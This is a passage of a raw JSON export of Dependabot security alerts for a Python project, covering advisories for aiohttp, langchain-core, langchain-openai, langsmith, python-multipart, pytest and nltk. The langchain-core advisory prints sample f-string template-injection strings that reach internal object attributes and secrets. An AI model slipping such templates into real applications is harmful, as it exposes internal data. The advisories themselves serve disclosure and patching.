3.9.3","first_patched_version":{"identifier":"3.9.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00084,"percentile":0.24208},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-36","name":"Absolute Path Traversal"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"< 
3.9.3","first_patched_version":{"identifier":"3.9.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/120","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/120","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":119,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-openai"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-r7w7-9xr2-qq2r","cve_id":"CVE-2026-41488","summary":"langchain-openai: Image token counting SSRF protection can be bypassed via DNS rebinding","description":"## Summary\n\n`langchain-openai`'s `_url_to_size()` helper (used by `get_num_tokens_from_messages` for image token counting) validated URLs for SSRF protection and then fetched them in a separate network operation with independent DNS resolution. This left a TOCTOU / DNS rebinding window: an attacker-controlled hostname could resolve to a public IP during validation and then to a private/localhost IP during the actual fetch.\n\nThe practical impact is limited because the fetched response body is passed directly to Pillow's `Image.open()` to extract dimensions — the response content is never returned, logged, or otherwise exposed to the caller. An attacker cannot exfiltrate data from internal services through this path. 
A potential risk is blind probing (inferring whether an internal host/port is open based on timing or error behavior).\n\n## Affected versions\n\n- `langchain-openai` < 1.1.14\n\n## Patched versions\n\n- `langchain-openai` >= 1.1.14 (requires `langchain-core` >= 1.2.31)\n\n## Affected code\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py` — `_url_to_size()`\n\nThe vulnerable pattern was a validate-then-fetch with separate DNS resolution:\n\n```python\nvalidate_safe_url(image_source, allow_private=False, allow_http=True)\n# ... separate network operation with independent DNS resolution ...\nresponse = httpx.get(image_source, timeout=timeout)\n```\n\n## Fix\n\nThe fix replaces the validate-then-fetch pattern with an SSRF-safe httpx transport (`SSRFSafeSyncTransport` from `langchain-core`) that:\n\n- Resolves DNS once and validates all returned IPs against a policy (private ranges, cloud metadata, localhost, k8s internal DNS)\n- Pins the connection to the validated IP, eliminating the DNS rebinding window\n- Disables redirect following to prevent redirect-based SSRF bypasses\n\nThis fix was released in langchain-openai 1.1.14.","severity":"low","identifiers":[{"value":"GHSA-r7w7-9xr2-qq2r","type":"GHSA"},{"value":"CVE-2026-41488","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-r7w7-9xr2-qq2r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41488"},{"url":"https://github.com/advisories/GHSA-r7w7-9xr2-qq2r"}],"published_at":"2026-04-16T23:00:12Z","updated_at":"2026-04-27T16:33:54Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-openai"},"severity":"low","vulnerable_version_range":"< 
1.1.14","first_patched_version":{"identifier":"1.1.14"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","score":3.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00024,"percentile":0.06665},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","score":3.1},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-openai"},"severity":"low","vulnerable_version_range":"< 1.1.14","first_patched_version":{"identifier":"1.1.14"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/119","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/119","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":118,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langsmith"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-rr7j-v2q5-chgv","cve_id":"CVE-2026-41182","summary":"LangSmith SDK: Streaming token events bypass output redaction","description":"## Summary\n\nThe LangSmith SDK's output redaction controls (hideOutputs in JS, hide_outputs in Python) do not apply to streaming token events. When an LLM run produces streaming output, each chunk is recorded as a new_token event containing the raw token value. These events bypass the redaction pipeline entirely — prepareRunCreateOrUpdateInputs (JS) and _hide_run_outputs (Python) only process the inputs and outputs fields on a run, never the events array. 
As a result, applications relying on output redaction to prevent sensitive LLM output from being stored in LangSmith will still leak the full streamed content via run events.\n\n## Details\n\n**Both JS and Python SDKs are affected.** The same pattern exists in both:\n\n- **JS SDK**: `traceable.ts:997-1003` and `traceable.ts:1044-1050`\n- **Python SDK**: `run_helpers.py:1924` and `run_helpers.py:1996`\n\nIn both SDKs, `new_token` events with raw `kwargs.token` values are added during streaming, and the redaction pipeline (`hideOutputs` in JS, `hide_outputs` in Python) only processes `inputs`/`outputs` — never `events`.","severity":"medium","identifiers":[{"value":"GHSA-rr7j-v2q5-chgv","type":"GHSA"},{"value":"CVE-2026-41182","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-rr7j-v2q5-chgv"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41182"},{"url":"https://github.com/advisories/GHSA-rr7j-v2q5-chgv"}],"published_at":"2026-04-16T01:20:37Z","updated_at":"2026-04-24T20:52:17Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"npm","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.5.18","first_patched_version":{"identifier":"0.5.19"}},{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.7.30","first_patched_version":{"identifier":"0.7.31"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00036,"percentile":0.10614},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},{"cwe_id":"CWE-359","name":"Exposure of Private Personal Information to an Unauthorized Actor"},{"cwe_id":"CWE-532","name":"Insertion of Sensitive Information into Log 
File"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.7.30","first_patched_version":{"identifier":"0.7.31"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/118","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/118","created_at":"2026-05-13T05:27:18Z","updated_at":"2026-05-13T05:27:18Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":117,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mj87-hwqh-73pj","cve_id":"CVE-2026-40347","summary":"python-multipart affected by Denial of Service via large multipart preamble or epilogue data","description":"### Summary\n\nA denial of service vulnerability exists when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections.\n\n### Details\n\nTwo inefficient multipart parsing paths could be abused with attacker-controlled input.\n\nBefore the first multipart boundary, the parser handled leading CR and LF bytes inefficiently while searching for the start of the first part. After the closing boundary, the parser continued processing trailing epilogue data instead of discarding it immediately. As a result, parsing time could grow with the size of crafted data placed before the first boundary or after the closing boundary.\n\n### Impact\n\nAn attacker can send oversized malformed multipart bodies that consume excessive CPU time during request parsing, reducing request-handling capacity and delaying legitimate requests. 
This issue degrades availability but does not typically result in a complete denial of service for the entire application.\n\n### Mitigation\n\nUpgrade to version `0.0.26` or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.","severity":"medium","identifiers":[{"value":"GHSA-mj87-hwqh-73pj","type":"GHSA"},{"value":"CVE-2026-40347","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-mj87-hwqh-73pj"},{"url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.26"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40347"},{"url":"https://github.com/advisories/GHSA-mj87-hwqh-73pj"}],"published_at":"2026-04-15T19:45:44Z","updated_at":"2026-04-24T20:51:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"medium","vulnerable_version_range":"< 0.0.26","first_patched_version":{"identifier":"0.0.26"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0002,"percentile":0.05504},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-834","name":"Excessive Iteration"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"medium","vulnerable_version_range":"< 
0.0.26","first_patched_version":{"identifier":"0.0.26"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/117","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/117","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":116,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"pytest"},"manifest_path":"methods/EverCore/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6w46-j5rx-g56g","cve_id":"CVE-2025-71176","summary":"pytest has vulnerable tmpdir handling","description":"pytest through 9.0.2 on UNIX relies on directories with the `/tmp/pytest-of-{user}` name pattern, which allows local users to cause a denial of service or possibly gain privileges.","severity":"medium","identifiers":[{"value":"GHSA-6w46-j5rx-g56g","type":"GHSA"},{"value":"CVE-2025-71176","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-71176"},{"url":"https://github.com/pytest-dev/pytest/issues/13669"},{"url":"https://www.openwall.com/lists/oss-security/2026/01/21/5"},{"url":"https://github.com/pytest-dev/pytest/pull/14343"},{"url":"https://github.com/pytest-dev/pytest/commit/95d8423bd24992deea5b9df32555fa1741679e2c"},{"url":"https://github.com/pytest-dev/pytest/releases/tag/9.0.3"},{"url":"https://github.com/advisories/GHSA-6w46-j5rx-g56g"}],"published_at":"2026-01-22T06:30:29Z","updated_at":"2026-04-13T16:38:47Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pytest"},"severity":"medium","vulnerable_version_range":"< 
9.0.3","first_patched_version":{"identifier":"9.0.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L","score":6.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":6.0e-05,"percentile":0.0025},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L","score":6.8},"cwes":[{"cwe_id":"CWE-379","name":"Creation of Temporary File in Directory with Insecure Permissions"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pytest"},"severity":"medium","vulnerable_version_range":"< 9.0.3","first_patched_version":{"identifier":"9.0.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/116","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/116","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":115,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-926x-3r5x-gfhw","cve_id":"CVE-2026-40087","summary":"LangChain has incomplete f-string validation in prompt templates","description":"LangChain's f-string prompt-template validation was incomplete in two respects.\n\nFirst, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as `PromptTemplate`. 
In particular, `DictPromptTemplate` and `ImagePromptTemplate` could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting.\n\nExamples of the affected shape include:\n\n```python\n\"{message.additional_kwargs[secret]}\"\n\"https://example.com/{image.__class__.__name__}.png\"\n```\n\nSecond, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. For example:\n\n```python\n\"{name:{name.__class__.__name__}}\"\n```\n\nIn this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime.\n\n## Affected usage\n\nThis issue is only relevant for applications that accept untrusted template strings, rather than only untrusted template variable values.\n\nIn addition, practical impact depends on what objects are passed into template formatting:\n\n- If applications only format simple values such as strings and numbers, impact is limited and may only result in formatting errors.\n- If applications format richer Python objects, attribute access and indexing may interact with internal object state during formatting.\n\nIn many deployments, these conditions are not commonly present together. Applications that allow end users to author arbitrary templates often expose only a narrow set of simple template variables, while applications that work with richer internal Python objects often keep template structure under developer control. 
As a result, the highest-impact scenario is plausible but is not representative of all LangChain applications.\n\nApplications that use hardcoded templates or that only allow users to provide variable values are not affected by this issue.\n\n## Impact\n\nThe direct issue in `DictPromptTemplate` and `ImagePromptTemplate` allowed attribute access and indexing expressions to survive template construction and then be evaluated during formatting. When richer Python objects were passed into formatting, this could expose internal fields or nested data to prompt output, model context, or logs.\n\nThe nested format-spec issue is narrower in scope. It bypassed the intended validation rules for f-string templates, but in simple cases it results in an invalid format specifier error rather than direct disclosure. Accordingly, its practical impact is lower than that of direct top-level attribute traversal.\n\nOverall, the practical severity depends on deployment. Meaningful confidentiality impact requires attacker control over the template structure itself, and higher impact further depends on the surrounding application passing richer internal Python objects into formatting.\n\n## Fix\n\nThe fix consists of two changes.\n\nFirst, LangChain now applies f-string safety validation consistently to `DictPromptTemplate` and `ImagePromptTemplate`, so templates containing attribute access or indexing expressions are rejected during construction and deserialization.\n\nSecond, LangChain now rejects nested replacement fields inside f-string format specifiers.\n\nConcretely, LangChain validates parsed f-string fields and raises an error for:\n\n- variable names containing attribute access or indexing syntax such as `.` or `[]`\n- format specifiers containing `{` or `}`\n\nThis blocks templates such as:\n\n```python\n\"{message.additional_kwargs[secret]}\"\n\"https://example.com/{image.__class__.__name__}.png\"\n\"{name:{name.__class__.__name__}}\"\n```\n\nThe fix preserves ordinary 
f-string formatting features such as standard format specifiers and conversions, including examples like:\n\n```python\n\"{value:.2f}\"\n\"{value:>10}\"\n\"{value!r}\"\n```\n\nIn addition, the explicit template-validation path now applies the same structural f-string checks before performing placeholder validation, ensuring that the security checks and validation checks remain aligned.","severity":"medium","identifiers":[{"value":"GHSA-926x-3r5x-gfhw","type":"GHSA"},{"value":"CVE-2026-40087","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-926x-3r5x-gfhw"},{"url":"https://github.com/langchain-ai/langchain/pull/36612"},{"url":"https://github.com/langchain-ai/langchain/pull/36613"},{"url":"https://github.com/langchain-ai/langchain/commit/6bab0ba3c12328008ddca3e0d54ff5a6151cd27b"},{"url":"https://github.com/langchain-ai/langchain/commit/af2ed47c6f008cdd551f3c0d87db3774c8dfe258"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.84"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.28"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40087"},{"url":"https://github.com/advisories/GHSA-926x-3r5x-gfhw"}],"published_at":"2026-04-08T21:51:32Z","updated_at":"2026-04-10T14:41:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":"< 0.3.83","first_patched_version":{"identifier":"0.3.84"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":">= 1.0.0a1, < 
1.2.28","first_patched_version":{"identifier":"1.2.28"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00055,"percentile":0.17055},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-1336","name":"Improper Neutralization of Special Elements Used in a Template Engine"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":">= 1.0.0a1, < 1.2.28","first_patched_version":{"identifier":"1.2.28"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/115","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/115","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":114,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-c427-h43c-vf67","cve_id":"CVE-2026-34525","summary":"AIOHTTP accepts duplicate Host headers","description":"### Summary\n\nMultiple Host headers were allowed in aiohttp.\n\n### Impact\n\nMostly this doesn't affect aiohttp security itself, but if a reverse proxy is applying security rules depending on the target Host, it is theoretically possible that the proxy and aiohttp could process different host names, possibly resulting in bypassing a security check on the proxy and getting a request processed by aiohttp in a privileged sub app when using `Application.add_domain()`.\n\n-----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349\nPatch: https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000","severity":"medium","identifiers":[{"value":"GHSA-c427-h43c-vf67","type":"GHSA"},{"value":"CVE-2026-34525","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34525"},{"url":"https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000"},{"url":"https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-c427-h43c-vf67"}],"published_at":"2026-04-01T21:49:45Z","updated_at":"2026-04-01T21:49:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N","score":6.3}},"epss":{"percentage":0.0013,"percentile":0.3204},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/114","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/114","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":113,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-63hf-3vf5-4wqf","cve_id":"CVE-2026-34520","summary":"AIOHTTP's C parser (llhttp) accepts null bytes and control characters in response header values - header injection/security bypass","description":"### Summary\n\nThe C parser (the default for most installs) accepted null bytes and control characters is response headers.\n\n### Impact\n\nAn attacker could send header values that are interpreted differently than expected due to the presence of control characters. 
For example, `request.url.origin()` may return a different value than the raw Host header, or what a reverse proxy interpreted it as., potentially resulting in some kind of security bypass.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4","severity":"low","identifiers":[{"value":"GHSA-63hf-3vf5-4wqf","type":"GHSA"},{"value":"CVE-2026-34520","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-63hf-3vf5-4wqf"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34520"},{"url":"https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-63hf-3vf5-4wqf"}],"published_at":"2026-04-01T21:49:06Z","updated_at":"2026-04-06T23:12:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","score":9.1},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00063,"percentile":0.19232},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","score":9.1},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/113","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/113","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":112,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mwh4-6h8g-pg8w","cve_id":"CVE-2026-34519","summary":"AIOHTTP has HTTP response splitting via \\r in reason phrase","description":"### Summary\n\nAn attacker who controls the `reason` parameter when creating a `Response` may be able to inject extra headers or similar exploits.\n\n### Impact\n\nIn the unlikely situation that an application allows untrusted data to be used in the response's `reason` parameter, then an attacker could manipulate the response to send something different from what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b","severity":"low","identifiers":[{"value":"GHSA-mwh4-6h8g-pg8w","type":"GHSA"},{"value":"CVE-2026-34519","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34519"},{"url":"https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-mwh4-6h8g-pg8w"}],"published_at":"2026-04-01T21:48:24Z","updated_at":"2026-04-01T21:48:25Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00043,"percentile":0.12846},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/112","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/112","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":111,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-966j-vmvw-g2g9","cve_id":"CVE-2026-34518","summary":"AIOHTTP leaks Cookie and Proxy-Authorization headers on cross-origin redirect","description":"### Summary\n\nWhen following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers.\n\n### Impact\n\nThe Cookie and Proxy-Authorizations headers could contain sensitive information which may be leaked to an unintended party after following a redirect.\n\n-----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6","severity":"low","identifiers":[{"value":"GHSA-966j-vmvw-g2g9","type":"GHSA"},{"value":"CVE-2026-34518","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-966j-vmvw-g2g9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34518"},{"url":"https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-966j-vmvw-g2g9"}],"published_at":"2026-04-01T21:47:46Z","updated_at":"2026-04-24T20:33:20Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00041,"percentile":0.12317},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
